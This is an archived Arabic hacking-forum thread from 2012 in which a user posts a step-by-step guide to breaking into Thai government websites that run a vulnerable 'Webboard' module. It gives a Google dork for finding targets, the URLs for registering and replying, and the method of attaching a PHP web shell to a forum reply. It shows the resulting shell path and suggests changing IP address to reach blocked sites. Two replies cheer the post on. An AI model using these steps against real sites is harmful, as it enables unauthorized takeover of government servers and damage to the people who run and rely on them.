:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة خطيرة لاختراق المواقع الحكومية (Webboard) (http://www.vbspiders.com/vb/t63231.html)

barbaros 07-06-2012 02:53 PM

ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
 
السلام عليكم ورحمة الله وبركاته.

ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل

Dork:
كود:

site:go.th inurl:name=member+file=index
رابط التسجيل
كود:

http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index

بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:

http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard

نختار أحد المواضيع لنضيف الرد:

كود:

http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49

أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:

http://i50.tinypic.com/k3wu82.jpg
--------------------------------------------------------------------------

بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:

http://i49.tinypic.com/2z6bbwk.jpg



والرابط يكون مثل هذا:

كود:

http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php
مبروك !

ملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية

بالتوفيق

°l||l° نور الظلام °l||l° 07-11-2012 06:16 PM

رد: ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
 
بالتوفيق لك :)

vpn_31 07-12-2012 12:39 PM

رد: ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
 
نايس مع انه أغلب ألمواقع تم اختراقها


الساعة الآن 10:01 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0